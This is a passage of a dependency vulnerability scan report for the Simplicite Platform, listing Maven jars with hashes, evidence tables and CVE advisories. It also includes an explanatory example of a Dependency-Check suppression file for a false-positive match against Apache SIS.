Evidence Type Source Name Value Confidence Vendor file name rhino-js-engine High Vendor jar package name javascript Highest Vendor jar package name phobos Low Vendor jar package name script Highest Vendor jar package name script Low Vendor jar package name sun Low Vendor jar (hint) package name oracle Low Vendor pom artifactid rhino-js-engine Highest Vendor pom artifactid rhino-js-engine Low Vendor pom developer email alex@inspiracio.cat Low Vendor pom developer name Alexander Bunkenburg Medium Vendor pom developer org inspiració.cat Medium Vendor pom developer org URL http://www.inspiracio.cat Medium Vendor pom groupid cat.inspiracio Highest Vendor pom name rhino-js-engine High Vendor pom url http://www.inspiracio.cat Highest Product file name rhino-js-engine High Product jar package name javascript Highest Product jar package name phobos Low Product jar package name script Highest Product jar package name script Low Product jar package name util Low Product pom artifactid rhino-js-engine Highest Product pom developer email alex@inspiracio.cat Low Product pom developer name Alexander Bunkenburg Low Product pom developer org inspiració.cat Low Product pom developer org URL http://www.inspiracio.cat Low Product pom groupid cat.inspiracio Highest Product pom name rhino-js-engine High Product pom url http://www.inspiracio.cat Medium Version file version 1.7.10 High Version pom version 1.7.10 Highest
rhino-js-engine-1.7.10.jar: toplevel.js
File Path: /var/simplicite/.m2/repository/cat/inspiracio/rhino-js-engine/1.7.10/rhino-js-engine-1.7.10.jar/META-INF/toplevel.js
MD5: 491854ddbf3787e63aec2d77d4aad938
SHA1: 0cc36fe5c5269749b8d94252d7490d2d82bda8ed
SHA256: 511041250766b0811a7767801a1bec1be89a5bddbbe9e455ad7ea2057ba473f7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence
rngom-2.3.2.jar
Description:
RNGOM is a RelaxNG Object model library (XSOM for RelaxNG).
File Path: /var/simplicite/.m2/repository/com/sun/xml/bind/external/rngom/2.3.2/rngom-2.3.2.jar
MD5: 16cae2e80f24e2cf10ad6b5d95114ae0
SHA1: 6b8c5d0984c31a01d98290cee4ab9bde13536431
SHA256: 02165b9f0020160873f13e29e243b02e5c578792f9d1f2367fbadfcf8374fc78
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rngom High Vendor jar package name rngom Highest Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor pom artifactid rngom Highest Vendor pom artifactid rngom Low Vendor pom groupid com.sun.xml.bind.external Highest Vendor pom name RNGOM High Vendor pom parent-artifactid jaxb-external-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name rngom High Product jar package name rngom Highest Product jar package name sun Highest Product jar package name xml Highest Product Manifest Implementation-Title RNGOM High Product pom artifactid rngom Highest Product pom groupid com.sun.xml.bind.external Highest Product pom name RNGOM High Product pom parent-artifactid jaxb-external-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
rome-1.12.1.jar
Description:
All Roads Lead to ROME. ROME is a set of Atom/RSS Java utilities that make it
easy to work in Java with most syndication formats. Today it accepts all flavors of RSS
(0.90, 0.91, 0.92, 0.93, 0.94, 1.0 and 2.0), Atom 0.3 and Atom 1.0 feeds. Rome includes
a set of parsers and generators for the various flavors of feeds, as well as converters
to convert from one format to another. The parsers can give you back Java objects that
are either specific for the format you want to work with, or a generic normalized
SyndFeed object that lets you work with the data without bothering about the
underlying format.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/rometools/rome/1.12.1/rome-1.12.1.jar
MD5: ff2b10fb031f44513e5c291817aca032
SHA1: e9038b34b001007b2a1f3823c532f3524222075f
SHA256: 13414d70a6c185e1374588321861c6e9eb7928eee502d032094ef3ca0fd921ae
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rome High Vendor jar package name atom Highest Vendor jar package name rome Highest Vendor jar package name rometools Highest Vendor jar package name rss Highest Vendor Manifest automatic-module-name com.rometools.rome Medium Vendor Manifest bundle-symbolicname com.rometools.rome Medium Vendor Manifest implementation-url http://rometools.com/rome Low Vendor Manifest Implementation-Vendor-Id com.rometools Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid rome Highest Vendor pom artifactid rome Low Vendor pom groupid com.rometools Highest Vendor pom name rome High Vendor pom parent-artifactid rome-parent Low Product file name rome High Product jar package name atom Highest Product jar package name rome Highest Product jar package name rometools Highest Product jar package name rss Highest Product Manifest automatic-module-name com.rometools.rome Medium Product Manifest Bundle-Name rome Medium Product Manifest bundle-symbolicname com.rometools.rome Medium Product Manifest Implementation-Title rome High Product Manifest implementation-url http://rometools.com/rome Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title rome Medium Product pom artifactid rome Highest Product pom groupid com.rometools Highest Product pom name rome High Product pom parent-artifactid rome-parent Medium Version file version 1.12.1 High Version Manifest Bundle-Version 1.12.1 High Version Manifest Implementation-Version 1.12.1 High Version pom version 1.12.1 Highest
rome-utils-1.12.1.jar
Description:
Utility classes for ROME projects
File Path: /var/simplicite/.m2/repository/com/rometools/rome-utils/1.12.1/rome-utils-1.12.1.jar
MD5: 6772713213cee7862e5e9ac1a8c0b79c
SHA1: e14b9757402f0971fabe245f8a3ee7c889151f26
SHA256: d65ce5f0926ee80e1ed19b176428846098000fc4db09360a1b4dd3a1a36ed477
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name rome-utils High Vendor jar package name rometools Highest Vendor jar package name utils Highest Vendor Manifest automatic-module-name com.rometools.rome.utils Medium Vendor pom artifactid rome-utils Highest Vendor pom artifactid rome-utils Low Vendor pom groupid com.rometools Highest Vendor pom name rome-utils High Vendor pom parent-artifactid rome-parent Low Product file name rome-utils High Product jar package name rometools Highest Product jar package name utils Highest Product Manifest automatic-module-name com.rometools.rome.utils Medium Product pom artifactid rome-utils Highest Product pom groupid com.rometools Highest Product pom name rome-utils High Product pom parent-artifactid rome-parent Medium Version file version 1.12.1 High Version pom version 1.12.1 Highest
Related Dependencies
rome-1.12.1.jar: rome-utils-1.12.1.jar
File Path: /var/simplicite/.m2/repository/com/rometools/rome/1.12.1/rome-1.12.1.jar/rome-utils-1.12.1.jar
MD5: 6772713213cee7862e5e9ac1a8c0b79c
SHA1: e14b9757402f0971fabe245f8a3ee7c889151f26
SHA256: d65ce5f0926ee80e1ed19b176428846098000fc4db09360a1b4dd3a1a36ed477
pkg:maven/com.rometools/rome-utils@1.12.1
CVE-2021-4277
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability.
CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
References:
Vulnerable Software & Versions:
s3-2.2.0.jar
Description:
jclouds components to access an implementation of S3
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/s3/2.2.0/s3-2.2.0.jar
MD5: fed1f33af4d2be951084edb7338be653
SHA1: 5e4e3d12349d8fd89ae35319df1f993be04694f8
SHA256: 964cb268008696ac2c12108ad43ba9dc03d5edb4cb1d69f5b37d138b4c249522
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name s3 High Vendor jar package name jclouds Highest Vendor jar package name s3 Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname s3 Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid s3 Highest Vendor pom artifactid s3 Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds s3 api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name s3 High Product jar package name jclouds Highest Product jar package name s3 Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds s3 api Medium Product Manifest bundle-symbolicname s3 Medium Product Manifest Implementation-Title jclouds s3 api High Product Manifest specification-title jclouds jclouds s3 api Medium Product pom artifactid s3 Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds s3 api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
sentiment-analysis-parser-0.1.jar
Description:
Combines Apache OpenNLP and Apache Tika and provides facilities for automatically deriving sentiment from text.
License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/edu/usc/ir/sentiment-analysis-parser/0.1/sentiment-analysis-parser-0.1.jar
MD5: 69727e01cb8165e2e5d637e527ea82d4
SHA1: 20d1524a1270c1d26e3314d2ee71a12e6a29a27d
SHA256: 035a28b4d65993b405ddcc98b4bb67cd038d4617e5c8e5c2f4d16d34c8f49e2b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sentiment-analysis-parser High Vendor jar package name apache Highest Vendor jar package name edu Highest Vendor jar package name ir Highest Vendor jar package name opennlp Highest Vendor jar package name opennlp Low Vendor jar package name parser Highest Vendor jar package name sentiment Highest Vendor jar package name sentiment Low Vendor jar package name tika Highest Vendor jar package name tools Low Vendor jar package name usc Highest Vendor pom artifactid sentiment-analysis-parser Highest Vendor pom artifactid sentiment-analysis-parser Low Vendor pom developer name Anastasija Mensikova Medium Vendor pom developer org Trinity Medium Vendor pom groupid edu.usc.ir Highest Vendor pom name SentimentAnalysisParser High Vendor pom url USCDataScience/SentimentAnalysisParser Highest Product file name sentiment-analysis-parser High Product jar package name apache Highest Product jar package name edu Highest Product jar package name ir Highest Product jar package name opennlp Highest Product jar package name parser Highest Product jar package name sentiment Highest Product jar package name sentiment Low Product jar package name tika Highest Product jar package name tools Low Product jar package name usc Highest Product pom artifactid sentiment-analysis-parser Highest Product pom developer name Anastasija Mensikova Low Product pom developer org Trinity Low Product pom groupid edu.usc.ir Highest Product pom name SentimentAnalysisParser High Product pom url USCDataScience/SentimentAnalysisParser High Version file version 0.1 High Version pom version 0.1 Highest
serializer-2.7.2.jar
Description:
Serializer to write out XML, HTML etc. as a stream of characters from an input DOM or from input
SAX events.
File Path: /var/simplicite/.m2/repository/xalan/serializer/2.7.2/serializer-2.7.2.jar
MD5: e8325763fd4235f174ab7b72ed815db1
SHA1: 24247f3bb052ee068971393bdb83e04512bb1c3c
SHA256: e8f5b4340d3b12a0cfa44ac2db4be4e0639e479ae847df04c4ed8b521734bb4a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name serializer High Vendor jar package name apache Highest Vendor jar package name serializer Highest Vendor jar package name xml Highest Vendor manifest: org/apache/xml/serializer/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xml/serializer/utils/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid serializer Highest Vendor pom artifactid serializer Low Vendor pom groupid xalan Highest Vendor pom name Xalan Java Serializer High Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url http://xml.apache.org/xalan-j/ Highest Product file name serializer High Product jar package name apache Highest Product jar package name serializer Highest Product jar package name utils Highest Product jar package name xml Highest Product manifest: org/apache/xml/serializer/ Implementation-Title org.apache.xml.serializer Medium Product manifest: org/apache/xml/serializer/ Specification-Title XSL Transformations (XSLT), at http://www.w3.org/TR/xslt Medium Product manifest: org/apache/xml/serializer/utils/ Implementation-Title org.apache.xml.serializer.utils Medium Product pom artifactid serializer Highest Product pom groupid xalan Highest Product pom name Xalan Java Serializer High Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url http://xml.apache.org/xalan-j/ Medium Version file version 2.7.2 High Version manifest: org/apache/xml/serializer/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xml/serializer/utils/ Implementation-Version 2.7.2 Medium Version pom parent-version 2.7.2 Low Version pom version 2.7.2 Highest
CVE-2022-34169
The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.
CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
sis-feature-0.8.jar
Description:
Representations of geographic features.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-feature/0.8/sis-feature-0.8.jar
MD5: abcd6da5f22d8a177f7f86ad9de6779b
SHA1: 65ea6ab21713dee99a0d2fd7196b80dd631a7e02
SHA256: c90e420f46c407060b11f62787a088b1127d9e6adb7c79d65ff5a6a99dabd9e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-feature High Vendor jar package name apache Highest Vendor jar package name feature Highest Vendor jar package name features Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-feature Low Vendor Manifest bundle-symbolicname org.apache.sis.feature Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-feature Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-feature Highest Vendor pom artifactid sis-feature Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email travis.pinney@gmail.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id tlpinney Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Travis L. Pinney Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS features High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-feature High Product jar package name apache Highest Product jar package name feature Highest Product jar package name features Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-feature Low Product Manifest Bundle-Name Apache SIS features Medium Product Manifest bundle-symbolicname org.apache.sis.feature Medium Product Manifest Implementation-Title Apache SIS features High Product Manifest implementation-url http://sis.apache.org/core/sis-feature Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-feature Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email travis.pinney@gmail.com Low Product pom developer id desruisseaux Low Product pom developer id tlpinney Low Product pom developer name Martin Desruisseaux Low Product pom developer name Travis L. Pinney Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS features High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-metadata-0.8.jar
Description:
Implementations of metadata derived from ISO 19115. This module provides both an implementation
of the metadata interfaces defined in GeoAPI, and a framework for handling those metadata through
Java reflection.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-metadata/0.8/sis-metadata-0.8.jar
MD5: de28abdfc0d83256a87db3ceb6b094c2
SHA1: b5d309428e78ebdaf1ea04aec8747a2093689e20
SHA256: d04e98ee08441d30663d1bc45582da9672360b1a148a4faccbb55a5e1437da7c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-metadata High Vendor jar package name apache Highest Vendor jar package name iso Highest Vendor jar package name metadata Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-metadata Low Vendor Manifest bundle-symbolicname org.apache.sis.metadata Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-metadata Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.TypeRegistration" Low Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-metadata Highest Vendor pom artifactid sis-metadata Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer id desruisseaux Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS metadata High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-metadata High Product jar package name apache Highest Product jar package name internal Highest Product jar package name iso Highest Product jar package name jaxb Highest Product jar package name metadata Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-metadata Low Product Manifest Bundle-Name Apache SIS metadata Medium Product Manifest bundle-symbolicname org.apache.sis.metadata Medium Product Manifest Implementation-Title Apache SIS metadata High Product Manifest implementation-url http://sis.apache.org/core/sis-metadata Low Product Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.TypeRegistration" Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-metadata Highest Product pom developer email desruisseaux@apache.org Low Product pom developer id desruisseaux Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS metadata High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-netcdf-0.8.jar
Description:
Bridge between netCDF Climate and Forecast (CF) convention and ISO 19115 metadata.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/sis/storage/sis-netcdf/0.8/sis-netcdf-0.8.jar
MD5: 2096511e5dac7016da8eacd3a4914e99
SHA1: 0aa44675239c11eeb598ef054efdf2673cd4953a
SHA256: a6477f4437c0a0ed623664739b6c9ada0cceba01d5163d0793eadb5b23677511
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-netcdf High Vendor jar package name apache Highest Vendor jar package name netcdf Highest Vendor jar package name sis Highest Vendor jar package name storage Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/storage/sis-netcdf Low Vendor Manifest bundle-symbolicname org.apache.sis.storage.netcdf Medium Vendor Manifest implementation-url http://sis.apache.org/storage/sis-netcdf Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.storage Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-netcdf Highest Vendor pom artifactid sis-netcdf Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email johann.sorel@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jsorel Medium Vendor pom developer name Johann Sorel Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.apache.sis.storage Highest Vendor pom name Apache SIS netCDF storage High Vendor pom parent-artifactid storage Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-netcdf High Product jar package name apache Highest Product jar package name netcdf Highest Product jar package name sis Highest Product jar package name storage Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/storage/sis-netcdf Low Product Manifest Bundle-Name Apache SIS netCDF storage Medium Product Manifest bundle-symbolicname org.apache.sis.storage.netcdf Medium Product Manifest Implementation-Title Apache SIS netCDF storage High Product Manifest implementation-url http://sis.apache.org/storage/sis-netcdf Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-netcdf Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email johann.sorel@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id jsorel Low Product pom developer name Johann Sorel Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.apache.sis.storage Highest Product pom name Apache SIS netCDF storage High Product pom parent-artifactid storage Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
sis-referencing-0.8.jar
Description:
Implementations of Coordinate Reference Systems (CRS),
conversion and transformation services derived from ISO 19111.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/sis/core/sis-referencing/0.8/sis-referencing-0.8.jar
MD5: c0bbeebdff505844f3d7181a127abcbb
SHA1: 8c9eb6766665eea110f47c53787b7a9bc1310400
SHA256: f194d08bdda2509e104ea32004384298014ecd664aa7d7c30dacf0ee41bfa2f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-referencing High Vendor jar package name apache Highest Vendor jar package name crs Highest Vendor jar package name referencing Highest Vendor jar package name sis Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/core/sis-referencing Low Vendor Manifest bundle-symbolicname org.apache.sis.referencing Medium Vendor Manifest implementation-url http://sis.apache.org/core/sis-referencing Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.core Medium Vendor Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.AdapterReplacement",org.opengis.referencing.operation.MathTransformFactory,org.opengis.referencing.operation.OperationMethod,org.opengis.temporal.TemporalFactory Low Vendor Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-referencing Highest Vendor pom artifactid sis-referencing Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email mattmann@apache.org Low Vendor pom developer email remi.marechal@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id mattmann Medium Vendor pom developer id rmarechal Medium Vendor pom developer name Chris A. Mattmann Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer name Rémi Maréchal Medium Vendor pom developer org Geomatys Medium Vendor pom developer org NASA Jet Propulsion Laboratory Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom developer org URL http://www.jpl.nasa.gov Medium Vendor pom groupid org.apache.sis.core Highest Vendor pom name Apache SIS referencing High Vendor pom parent-artifactid core Low Vendor pom parent-groupid org.apache.sis Medium Product file name sis-referencing High Product jar package name apache Highest Product jar package name crs Highest Product jar package name internal Highest Product jar package name jaxb Highest Product jar package name operation Highest Product jar package name referencing Highest Product jar package name sis Highest Product Manifest built-on 2017-11-10T19:36:30Z Low Product Manifest bundle-docurl http://sis.apache.org/core/sis-referencing Low Product Manifest Bundle-Name Apache SIS referencing Medium Product Manifest bundle-symbolicname org.apache.sis.referencing Medium Product Manifest Implementation-Title Apache SIS referencing High Product Manifest implementation-url http://sis.apache.org/core/sis-referencing Low Product Manifest provide-capability osgi.serviceloader;osgi.serviceloader="org.apache.sis.internal.jaxb.AdapterReplacement",org.opengis.referencing.operation.MathTransformFactory,org.opengis.referencing.operation.OperationMethod,org.opengis.temporal.TemporalFactory Low Product Manifest require-capability osgi.extender;filter:="(osgi.extender=osgi.serviceloader.registrar)",osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid sis-referencing Highest Product pom developer email desruisseaux@apache.org Low Product pom developer email mattmann@apache.org Low Product pom developer email remi.marechal@geomatys.com Low Product pom developer id desruisseaux Low Product pom developer id mattmann Low Product pom developer id rmarechal Low Product pom developer name Chris A. Mattmann Low Product pom developer name Martin Desruisseaux Low Product pom developer name Rémi Maréchal Low Product pom developer org Geomatys Low Product pom developer org NASA Jet Propulsion Laboratory Low Product pom developer org URL http://www.geomatys.com Low Product pom developer org URL http://www.jpl.nasa.gov Low Product pom groupid org.apache.sis.core Highest Product pom name Apache SIS referencing High Product pom parent-artifactid core Medium Product pom parent-groupid org.apache.sis Medium Version file version 0.8 High Version Manifest Implementation-Version 0.8 High Version pom version 0.8 Highest
CVE-2023-3485
Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.
If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.
CWE-1188
CVSSv3:
Base Score: LOW (3.6) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L References:
Vulnerable Software & Versions:
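CVE-2023-3485 describes Temporal Server, not Apache SIS: sis-referencing-0.8.jar is a coordinate-referencing library, and the only place "temporal" appears in its evidence above is the org.opengis.temporal.TemporalFactory service name in the OSGi provide-capability header, which is the most likely source of the CPE match. A practitioner records that triage decision in a Dependency-Check suppression file rather than re-examining the finding on every scan. The file below is an added example, not part of this report or of the Simplicite project; the filename suppressions.xml is an assumption. It pins the suppression to the jar's SHA1 shown above and to this one CVE, so a different CVE against the same jar, or a different build of the jar, would still be reported.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Added example suppression file (assumed name: suppressions.xml); not part of the scanned project -->
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
    <suppress>
        <notes><![CDATA[
        False positive: CVE-2023-3485 is a Temporal Server advisory. sis-referencing-0.8.jar is
        Apache SIS referencing; the match comes from the org.opengis.temporal.TemporalFactory
        service name in the jar's OSGi Provide-Capability manifest header.
        ]]></notes>
        <!-- Pin to this exact artifact: a rebuilt or upgraded jar has a different SHA1 and is evaluated afresh -->
        <sha1>8c9eb6766665eea110f47c53787b7a9bc1310400</sha1>
        <!-- Pin to this one CVE: any other finding against the same jar still surfaces -->
        <cve>CVE-2023-3485</cve>
    </suppress>
</suppressions>
```

Pass the file with `--suppression suppressions.xml` on the command line, or through `<suppressionFiles>` in the Maven plugin configuration; the suppressed finding then moves out of the vulnerable-dependency list and into the suppressed count rather than disappearing without trace.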
sis-storage-0.8.jarDescription:
Provides the interfaces and base classes to be implemented by various storage formats.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/sis/storage/sis-storage/0.8/sis-storage-0.8.jar
MD5: 5f3238f3d977f9299174e18c45cfaba2
SHA1: 53b323f55881b4cd6fe1ecf9464a7066a3ae2eb6
SHA256: 7cade99264a96233e11f1fd888c23f647d94673cab0275a3d81d0d990bd204e5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sis-storage High Vendor jar package name apache Highest Vendor jar package name sis Highest Vendor jar package name storage Highest Vendor Manifest built-on 2017-11-10T19:36:30Z Low Vendor Manifest bundle-docurl http://sis.apache.org/storage/sis-storage Low Vendor Manifest bundle-symbolicname org.apache.sis.storage Medium Vendor Manifest implementation-url http://sis.apache.org/storage/sis-storage Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.sis.storage Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid sis-storage Highest Vendor pom artifactid sis-storage Low Vendor pom developer email desruisseaux@apache.org Low Vendor pom developer email johann.sorel@geomatys.com Low Vendor pom developer email mattmann@apache.org Low Vendor pom developer email remi.marechal@geomatys.com Low Vendor pom developer id desruisseaux Medium Vendor pom developer id jsorel Medium Vendor pom developer id mattmann Medium Vendor pom developer id rmarechal Medium Vendor pom developer name Chris A. 
